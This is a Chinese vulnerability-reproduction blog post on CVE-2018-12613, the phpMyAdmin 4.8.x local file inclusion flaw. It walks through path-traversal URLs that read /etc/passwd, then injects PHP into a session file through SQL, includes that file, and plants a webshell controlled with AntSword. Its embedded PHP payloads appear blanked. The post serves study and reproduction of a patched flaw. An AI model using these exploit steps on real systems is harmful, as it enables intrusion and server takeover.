CVE-2018-12613:本地文件包含

前言:

phpMyAdmin是phpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。

漏洞影响版本

  • Phpmyadmin Phpmyadmin 4.8.0
  • Phpmyadmin Phpmyadmin 4.8.0.1
  • Phpmyadmin Phpmyadmin 4.8.1

本地文件包含

LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。

poc如下:

POC如下:
 
1)执行SQL语句,将PHP代码写入Session文件中:
    select ''
2)包含session文件:
    http://ip/index.php?target=db_sql.php%253f/../../../../../../../../var/l ib/php/sessions/sess_*** 		# *** 为phpMyAdmin的session值

实操:

1.查看版本为phpmyadmin 4.8.1

CVE-2018-12613:本地文件包含_第1张图片

2. phpmyadmin 4.8.1 存在远程文件包含漏洞(CVE-2018-12613)直接复制网上的poc进行利用

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

CVE-2018-12613:本地文件包含_第2张图片

3.成功读取后,查询phpinfo信息

select ""

CVE-2018-12613:本地文件包含_第3张图片

4.得知session为'5524de4cf083ebc974a3c0ccaec70f42'

CVE-2018-12613:本地文件包含_第4张图片

5.进行拼接命令,成功查看了phpinfo

index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_5524de4cf083ebc974a3c0ccaec70f42

知识点:

以下是关于Session的默认保存路径的主要内容:

Linux:
/tmp 或 /var/lib/php/session
Windows:
C:WINDOWSTemp

CVE-2018-12613:本地文件包含_第5张图片

6.利用file_get_contents函数写入木马

格式:

#函数可以把一个字符串写入文件中

select '");?>';

CVE-2018-12613:本地文件包含_第6张图片

7.拿到新的session进行再次拼接命令,并成功执行

84b4d8e236c530d3e17cdc3267de07cb

CVE-2018-12613:本地文件包含_第7张图片

8.查看shell.php为空白页可能已经写入木马文件,用hackbar成功读取phpinfo();文件

CVE-2018-12613:本地文件包含_第8张图片

9.成功连接中国蚁剑,并得知为普通用户权限

CVE-2018-12613:本地文件包含_第9张图片

你可能感兴趣的:(漏洞复现,linux,bash,web,服务器)